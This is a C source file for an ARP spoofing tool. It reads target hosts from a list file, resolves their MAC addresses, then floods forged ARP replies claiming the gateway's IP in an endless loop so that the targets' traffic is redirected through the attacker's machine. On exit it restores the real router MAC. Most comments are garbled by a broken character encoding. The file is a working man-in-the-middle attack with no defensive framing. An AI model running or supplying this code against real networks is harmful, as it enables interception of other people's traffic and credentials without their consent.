#include "arp_spoof.h"

struct libnet_link_int *llif;
struct ether_addr router_mac, target_mac;
u_char *mac;
uint32_t router_ip, target_ip;
char *device;

void usage(void)
{
	fprintf(stderr, "Usage: arp_spoof [-i interface] [-d delay time for arp spoofing packet] -g Gateway(Router)_IP_Address\n");
	exit(1);
}

void cleanup(int sig)
{
	int i;
	
	//  router mac address Ͽ ش ȣƮ  router Ŷ
	// ϰ Ѵ.
	if (arp_find(router_ip, &router_mac)) {
		for (i = 0; i < 3; i++) {
				arp_send(llif, device, ARPOP_REPLY, (u_char *)&router_mac, router_ip, NULL, 0);
				sleep(1);
		}
	}
	fprintf(stderr, "\n(^_^ v Did you have a good time??\n");
	exit(0);
}

int main(int argc, char *argv[])
{
	int       c;
	int		  host_cnt = 0;
	char 	  ebuf[PCAP_ERRBUF_SIZE];
	FILE	  *fp;
	char 	  buffer[80];
	char	  cont_ip[16];
	unsigned  int 	d_time = 10000;
	
	device = NULL;

	
	while ((c = getopt(argc, argv, "i:d:g:h")) != -1) {
		switch (c) {
		case 'i':		// ethernet interface
			device = optarg;
			break;
		case 'g':		// Gateway IP Address
			if ((router_ip = libnet_name_resolve(optarg, 1)) == -1)
				usage();
			break;
		case 'd':		// arp packet delay time
			d_time = atoi(optarg);
			if ( (d_time < 1) || (d_time > 1000000) ) {
				fprintf(stderr, "Input the proper delay time!!\n");
				usage();
			}
			break;
	    case 'h':
			usage();
			break;
		default:
			usage();
		}
	}
	//  Option Checking
	if ( argc < 2 || router_ip == 0 )
		usage();
	// Switching hub  ȣ  	
    if((fp = fopen("switch_list.dat","r")) == NULL) {
		fprintf(stdout, "Can't open schedule file\n");
		exit(1);
    }
	// device 	
	if ( device == NULL )
		if ( (device = pcap_lookupdev(ebuf)) == NULL) {
			fprintf(stderr, "fail pcap_lookupdev()\n");
			exit(1);
		}

	// datalink interface 	
	if ((llif = libnet_open_link_interface(device, ebuf)) == 0)
		fprintf(stdout, "%s", ebuf);
	
	while(fgets(buffer, 80, fp) != NULL) {
		if ( buffer[0] == '#' )				// ּ line skip
			continue;

    	sscanf(buffer, "%18s", cont_ip);
		target_ip = inet_addr(cont_ip);
		// target hardware address ã´.
		if (target_ip != 0 && !arp_find(target_ip, &target_mac))
			fprintf(stdout, "couldn't arp for host %s", cont_ip);
		 
		make_switching_list(target_ip, (u_char *)&target_mac);
		host_cnt++;
	} // end of while loop 

	fclose(fp);

	if ( host_cnt == 0 ) {
		fprintf(stderr, ">> Input a switch list into SWITCH_LIST.DAT\n");
		exit(1);
	}

	signal(SIGHUP, cleanup); 		// hang-up
	signal(SIGINT, cleanup);		// Ctrl-C
	signal(SIGTERM, cleanup);		// Kill command

	// start the arp spoofing
	// You'll receive the packet of switching lists
	fprintf(stdout, "Start with switch lists(%d)..........\n", host_cnt);
	for (;;) {
		arp_send(llif, device, ARPOP_REPLY, NULL, router_ip, NULL, 0);
		usleep(d_time);
		fprintf(stderr, ".");
	}
	exit(0);
}
